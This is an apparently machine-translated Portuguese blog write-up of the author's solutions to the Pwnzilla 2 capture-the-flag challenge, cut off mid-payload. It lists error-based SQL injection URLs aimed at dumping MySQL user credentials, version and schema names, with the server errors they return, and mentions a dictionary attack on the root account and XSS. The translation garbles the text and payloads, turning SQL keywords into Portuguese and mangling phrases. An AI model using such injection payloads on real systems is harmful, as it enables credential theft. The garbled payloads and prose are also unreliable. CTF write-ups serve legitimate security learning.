Pwnzilla 2 – Ataques de Desafio

Após a conclusão da bem-sucedida competição Pwnzilla 2. Gostaria de expressar minha opinião e fornecer minhas próprias soluções, pois as competições mantêm você acordado e em pouco tempo você pode aprender muito devido à pressão do tempo.

No meu caso, em alguns dias aprendi muito sobre “Injeção cega de SQL“Mas também para criar um pequeno script python para ataque de senha do dicionário ao usuário ROOT[ Μήπως ήμουν τυχερός ? ].Pwnzilla 2

Na página não havia apenas injeção SQL, mas também XSS, como você verá abaixo nos testes que fiz.

O modo de ataque não é diferente do modo como os hackers o usam, e esse é o significado dos penteados.

Antes de mais, gostaria de parabenizar o vencedor da competição Pwnzilla 2 George Spanos mas também aos organizadores que deveriam nos experimentar com mais frequência.

Na minha opinião, grandes páginas gregas antes de hospedar dados pessoais do usuário devem ser testadas, como foi feito no desafio Pwnzilla

O nível de competição era bastante alto porque os gerentes eram muito versados ​​em ataques de injeção de SQL. Seus filtros bloquearam muitas palavras-chave (por exemplo, LOAD_FILE, INTO etc.)

– Alguém se pergunta por que ler e aprender injeção SQL e injeção cega quando existe o sqlmap?

  • E se o Mapa SQL falhar? Você precisa criar sua própria ferramenta ou tentar encontrar os problemas manualmente. Claro que a escolha é sua, apenas usei a maneira manual para aprender o máximo possível.
  • Vamos olhar algumas das minhas soluções juntasataque hacker

    Obviamente, antes de chegar ao resultado desejado, tentei o seguinte sem êxito:

    1)Trauma pós guerra

    2)Divisão HTTP

    3)Ataque de cabeçalho (Cookie, User-Agent, Host)

    As ferramentas que eu usei foram Burp Suite, Wireshark

    http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione db ()) 0509

    // Comando SELECT negado ao usuário ‘n3wdb0wn3r2’ @ ‘localhost’ para a tabela ‘user’

    http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione concat_ws (0x3a, usuário, senha) no mysql.user) 0509

    // Nome da coluna duplicada ‘5.5.43-0 + deb7u1’

    http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione * de (selecione name_const (versão (), 1), name_const (version (), 1)) a) 0509

    // Retorna mais de uma linha

    http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione nome do esquema em information_schema.schemata) 0509

    // Injeção HTML – Frond end Attack

    http: //pwnzilla.secnews.gr/pz2.php? id = `id` < (if(3>1, `